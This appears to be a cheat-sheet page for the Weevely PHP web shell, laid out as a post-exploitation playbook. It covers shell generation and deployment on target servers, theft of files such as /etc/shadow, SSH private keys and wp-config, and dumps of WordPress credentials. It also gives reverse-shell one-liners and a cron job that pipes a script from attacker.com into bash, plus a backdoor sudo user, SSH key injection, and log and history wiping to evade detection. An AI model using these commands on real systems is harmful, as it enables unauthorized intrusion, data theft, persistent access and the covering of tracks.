Weevely
Stealth PHP web shell with encrypted communication for post-exploitation including command execution, file management, privilege escalation, and lateral movement.
Overview
섹션 제목: “Overview”Weevely is a stealth PHP web shell that simulates a telnet-like connection for post-exploitation. It provides encrypted bidirectional communication, command execution, file management, and persistence capabilities.
Category: Web Shells & Post-Exploitation Language: PHP Communication: AES-256 encrypted HTTPS
Installation
섹션 제목: “Installation”Linux/Ubuntu
섹션 제목: “Linux/Ubuntu”# Clone from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3
# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git
pip3 install -r requirements.txt
# Make executable
chmod +x weevely.py
# Optional: Create symlink
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevelymacOS
섹션 제목: “macOS”# Homebrew installation
brew install weevely
# Manual installation
git clone https://github.com/epinna/weevely3.git
cd weevely3
pip3 install -r requirements.txt
sudo ln -s $(pwd)/weevely.py /usr/local/bin/weevelyFrom Source
섹션 제목: “From Source”# Direct from GitHub
git clone https://github.com/epinna/weevely3.git
cd weevely3
python3 -m weevely --helpBasic Commands
섹션 제목: “Basic Commands”| Command | Description |
|---|---|
weevely generate <password> <output.php> | Generate PHP web shell |
weevely <URL> <password> | Connect to deployed shell |
weevely --help | Display help information |
weevely --version | Show version information |
weevely <URL> <password> <command> | Execute single command |
Web Shell Generation
섹션 제목: “Web Shell Generation”Generate Shell
섹션 제목: “Generate Shell”# Basic shell generation
weevely generate password123 shell.php
# Generate with custom agent name
weevely generate mypassword agent.php
# Generate with obfuscated output
weevely generate securepass shell.php --obfuscateShell Variations
섹션 제목: “Shell Variations”# Generate shell with hardcoded password
weevely generate complex_pass backdoor.php
# Create minimal shell
weevely generate pass minimal.php --slim
# Generate for specific PHP version
weevely generate pass shell.php --php-version 7.4Deployment
섹션 제목: “Deployment”Upload Methods
섹션 제목: “Upload Methods”# Via web form (file upload vulnerability)
# Upload shell.php through vulnerable upload form
# Via FTP
ftp targethost.com
put shell.php
# Via SCP
scp shell.php user@target:/var/www/html/
# Via WebDAV
curl -X PUT --data-binary @shell.php http://target.com/shell.php
# Via insecure deserialization or RCE
# Place shell.php in accessible locationDeployment Examples
섹션 제목: “Deployment Examples”# Deploy to WordPress uploads
# Transfer shell.php to /wp-content/uploads/
# Deploy to common locations
/var/www/html/
/var/www/
/home/*/public_html/
/usr/share/nginx/html/
# Verify deployment
curl http://target.com/shell.phpConnection & Session Management
섹션 제목: “Connection & Session Management”Connect to Shell
섹션 제목: “Connect to Shell”# Connect to deployed shell
weevely http://target.com/shell.php mypassword
# Connect with custom URL parameter
weevely "http://target.com/shell.php?id=1" password
# Connect through proxy
weevely http://target.com/shell.php pass --proxy http://proxy:8080Interactive Shell
섹션 제목: “Interactive Shell”# Once connected, interactive shell starts
:> whoami
:> pwd
:> ls -la
:> helpSingle Command Execution
섹션 제목: “Single Command Execution”# Execute command without interactive session
weevely http://target.com/shell.php pass :system whoami
# Piped execution
weevely http://target.com/shell.php pass :system "cat /etc/passwd | head"
# Command with output redirection
weevely http://target.com/shell.php pass :system "id > /tmp/id.txt"File Management
섹션 제목: “File Management”File Operations
섹션 제목: “File Operations”# List directory contents
:> ls -la /home
:> find / -name "*.conf" 2>/dev/null
# Change directory
:> cd /var/www/html
:> pwd
# Display file contents
:> cat /etc/passwd
:> head -50 /var/www/html/config.phpUpload Files
섹션 제목: “Upload Files”# Upload local file
:> upload local_file.txt /tmp/
# Upload with permissions
:> upload exploit.sh /tmp/
:> chmod +x /tmp/exploit.sh
# Upload data exfiltration payload
:> upload data_stealer.py /var/www/Download Files
섹션 제목: “Download Files”# Download from target
:> download /etc/passwd
# Download application config
:> download /var/www/html/wp-config.php
# Download multiple files
:> download /etc/shadow
:> download /root/.ssh/id_rsaFile Browsing Module
섹션 제목: “File Browsing Module”# Use file module for browsing
:> file ls /home
# List with details
:> file ls -la /var/www
# Search for files
:> file find /home -name "*.txt"
# File permissions
:> file chmod 755 /tmp/shell.sh
# Create directories
:> file mkdir /tmp/stagingSystem Command Execution
섹션 제목: “System Command Execution”Execute Commands
섹션 제목: “Execute Commands”# Basic command execution
:> id
:> whoami
:> hostname
# Enumerate system
:> uname -a
:> cat /etc/os-release
:> lsb_release -a
# Check current privileges
:> sudo -l
:> groups
:> id -GInformation Gathering
섹션 제목: “Information Gathering”# Network information
:> ifconfig
:> ip addr show
:> netstat -tuln
:> ss -tuln
# Process enumeration
:> ps aux
:> ps -ef
# Running services
:> systemctl list-units --type=service
:> service --status-all
# Installed software
:> dpkg -l
:> rpm -qaShell Access
섹션 제목: “Shell Access”# Spawn reverse shell
:> bash -i >& /dev/tcp/attacker_ip/port 0>&1
# Python reverse shell
:> python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
# Perl reverse shell
:> perl -e 'use Socket;$i="attacker";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'Database Interaction
섹션 제목: “Database Interaction”SQL Module
섹션 제목: “SQL Module”# List databases
:> sql query "SHOW DATABASES;"
# Select current database
:> sql query "USE wordpress;"
# Enumerate tables
:> sql query "SHOW TABLES;"
# Dump table structure
:> sql query "DESCRIBE wp_users;"
# Extract data
:> sql query "SELECT * FROM wp_users;"
# Extract credentials
:> sql query "SELECT user_login, user_pass FROM wp_users;"MySQL Enumeration
섹션 제목: “MySQL Enumeration”# Check MySQL version
:> sql query "SELECT VERSION();"
# Current user
:> sql query "SELECT USER();"
# File privileges
:> sql query "SELECT load_file('/etc/passwd');"
# Write files
:> sql query "INTO OUTFILE '/var/www/html/shell.php' SELECT '<?php system($_GET[cmd]); ?>';"Network Pivoting
섹션 제목: “Network Pivoting”Network Reconnaissance
섹션 제목: “Network Reconnaissance”# Scan internal network
:> nmap -sV 192.168.1.0/24
# Port scanning
:> netstat -tuln | grep LISTEN
:> ss -tuln
# DNS resolution
:> nslookup internal-server
:> host internal.localLateral Movement
섹션 제목: “Lateral Movement”# Upload lateral movement tools
:> upload mimikatz.exe /tmp/
:> upload plink.exe /tmp/
# Proxy through shell for pivoting
weevely http://target.com/shell.php pass --proxy
# Create tunnel
:> ssh -D 1080 pivot@internal-hostPrivilege Escalation
섹션 제목: “Privilege Escalation”Enumeration
섹션 제목: “Enumeration”# Check sudo access
:> sudo -l
# Find SUID binaries
:> find / -perm -4000 2>/dev/null
# Check capabilities
:> getcap -r / 2>/dev/null
# Kernel version
:> uname -r
# Writable locations
:> find / -writable 2>/dev/null | grep -v procExploitation
섹션 제목: “Exploitation”# Using system module
:> system sudoers
# Check cron jobs
:> cat /etc/crontab
:> ls -la /etc/cron.d/
# Upload exploit
:> upload linux-exploit.c /tmp/
:> gcc /tmp/linux-exploit.c -o /tmp/exploit
:> /tmp/exploitPersistence Techniques
섹션 제목: “Persistence Techniques”Create Backdoor Users
섹션 제목: “Create Backdoor Users”# Add new user (requires root)
:> useradd -m -s /bin/bash backdoor
:> echo "backdoor:password123" | chpasswd
# Add to sudo
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoersCron Persistence
섹션 제목: “Cron Persistence”# Add cron job
:> echo "* * * * * /bin/bash -i >& /dev/tcp/attacker/4444 0>&1" | crontab -
# Write to system cron
:> echo "* * * * * root curl http://attacker.com/update.sh | bash" > /etc/cron.d/updateWeb Shell Placement
섹션 제목: “Web Shell Placement”# Multiple shells in different locations
:> cp /var/www/html/shell.php /tmp/shell.php
:> cp /var/www/html/shell.php /home/user/shell.php
:> cp /var/www/html/shell.php /var/tmp/shell.phpSSH Key Injection
섹션 제목: “SSH Key Injection”# Add authorized key
:> mkdir -p ~/.ssh
:> echo "ssh-rsa AAAA...key..." >> ~/.ssh/authorized_keys
:> chmod 700 ~/.ssh
:> chmod 600 ~/.ssh/authorized_keysObfuscation & OPSEC
섹션 제목: “Obfuscation & OPSEC”Obfuscation Techniques
섹션 제목: “Obfuscation Techniques”# Generate obfuscated shell
weevely generate password shell.php --obfuscate
# Custom user agent
:> system "curl -A 'Mozilla/5.0' http://internal.local/check"
# Encode commands
:> base64 sensitive_command
:> echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bashStealth Operations
섹션 제목: “Stealth Operations”# Disable bash history
:> export HISTFILE=/dev/null
:> unset HISTFILE
# Clear logs
:> cat /dev/null > /var/log/auth.log
:> echo "" > /var/log/apache2/access.log
# Remove traces
:> rm -f ~/.bash_history
:> history -cTraffic Evasion
섹션 제목: “Traffic Evasion”# Use HTTPS for encryption
weevely https://target.com/shell.php password
# Randomize requests
:> system "sleep $((RANDOM % 300)) && curl http://target.com/check"
# Fragment payload
# Break large commands into smaller chunksModules Reference
섹션 제목: “Modules Reference”Audit Module
섹션 제목: “Audit Module”# System audit
:> audit modules
# Check configurations
:> audit disk
:> audit netBackdoor Module
섹션 제목: “Backdoor Module”# Create backdoors
:> backdoor
# Web backdoor
:> backdoor shellBruteforce Module
섹션 제목: “Bruteforce Module”# Brute force credentials
:> bruteforce ftp
:> bruteforce ssh
# Dictionary attack
:> bruteforce http --wordlist=/path/to/dictFile Module
섹션 제목: “File Module”# Advanced file operations
:> file ls
:> file upload
:> file download
:> file cat
:> file chmodNet Module
섹션 제목: “Net Module”# Network tools
:> net scan
:> net proxy
:> net dumpSQL Module
섹션 제목: “SQL Module”# Database interaction
:> sql query "SELECT VERSION();"
:> sql dump
:> sql connectSystem Module
섹션 제목: “System Module”# System operations
:> system info
:> system priv
:> system whoamiModule Usage
섹션 제목: “Module Usage”List All Modules
섹션 제목: “List All Modules”:> helpGet Module Help
섹션 제목: “Get Module Help”# General help
:> help <module>
# Specific command help
:> <module> --helpModule Examples
섹션 제목: “Module Examples”# File operations
:> file ls /home
:> file upload payload.sh /tmp/
:> file download /etc/passwd
# Network scanning
:> net scan 192.168.1.0/24
# SQL queries
:> sql query "SELECT * FROM users;"
# System information
:> system unameOPSEC Considerations
섹션 제목: “OPSEC Considerations”Safe Practices
섹션 제목: “Safe Practices”- Use strong, unique passwords for each shell
- Rotate shells regularly
- Clean up uploaded files and logs
- Use HTTPS over HTTP when possible
- Minimize command output and logging
Detection Evasion
섹션 제목: “Detection Evasion”# Blend with legitimate traffic
:> User-Agent rotation
:> Timing variations between requests
:> Legitimate looking HTTP headers
# File integrity
:> Keep shell permissions consistent
:> Use timestamps matching other files
:> Avoid suspicious file namesCleanup Operations
섹션 제목: “Cleanup Operations”# Remove shells
:> find / -name "shell.php" -delete
# Clear logs
:> echo "" > /var/log/apache2/access.log
:> truncate -s 0 /var/log/auth.log
# Remove artifacts
:> history -c
:> rm -rf /tmp/uploaded_filesTroubleshooting
섹션 제목: “Troubleshooting”Connection Issues
섹션 제목: “Connection Issues”# Verify shell is accessible
curl http://target.com/shell.php
# Check firewall
:> telnet target.com 80
# Proxy issues
weevely http://target.com/shell.php pass --proxy http://proxy:8080Permission Errors
섹션 제목: “Permission Errors”# Check file permissions
:> ls -la /var/www/html/shell.php
# Fix permissions
:> chmod 755 /var/www/html/shell.php
# Check PHP execution
:> apache2ctl statusModule Failures
섹션 제목: “Module Failures”# Verify module availability
:> help
# Check dependencies
:> system "which nmap"
:> system "which curl"
# Update Weevely
git pull
pip3 install -r requirements.txtExamples
섹션 제목: “Examples”Initial Access Workflow
섹션 제목: “Initial Access Workflow”# 1. Generate shell
weevely generate Complex@Pass2024 shell.php
# 2. Upload through vulnerability
# Use identified file upload, RCE, or misconfig
# 3. Connect and verify
weevely http://target.com/uploads/shell.php Complex@Pass2024
# 4. Enumerate system
:> whoami
:> id
:> uname -aPost-Exploitation Workflow
섹션 제목: “Post-Exploitation Workflow”# 1. Information gathering
:> cat /etc/passwd
:> sudo -l
:> find / -perm -4000 2>/dev/null
# 2. Privilege escalation
:> system "exploit-suggester.sh"
:> gcc /tmp/exploit.c -o /tmp/exploit
:> /tmp/exploit
# 3. Persistence
:> echo "backdoor ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
:> crontab -e # Add reverse shell
# 4. Data exfiltration
:> upload sensitive_data.tar.gz
:> download /home/user/documents/Lateral Movement Workflow
섹션 제목: “Lateral Movement Workflow”# 1. Enumerate network
:> ifconfig
:> arp -a
# 2. Scan internal network
:> nmap -sV 192.168.1.0/24
# 3. Deploy to discovered hosts
:> scp shell.php user@internal-host:/tmp/
# 4. Create tunnel for pivoting
weevely http://internal-host/tmp/shell.php passwordSecurity References
섹션 제목: “Security References”- OWASP Web Shell Guidelines
- NIST Incident Response Procedures
- CWE-94: Improper Control of Generation of Code
- ATT&CK Framework - Web Shell (T1505.003)
- CVE Database for PHP vulnerabilities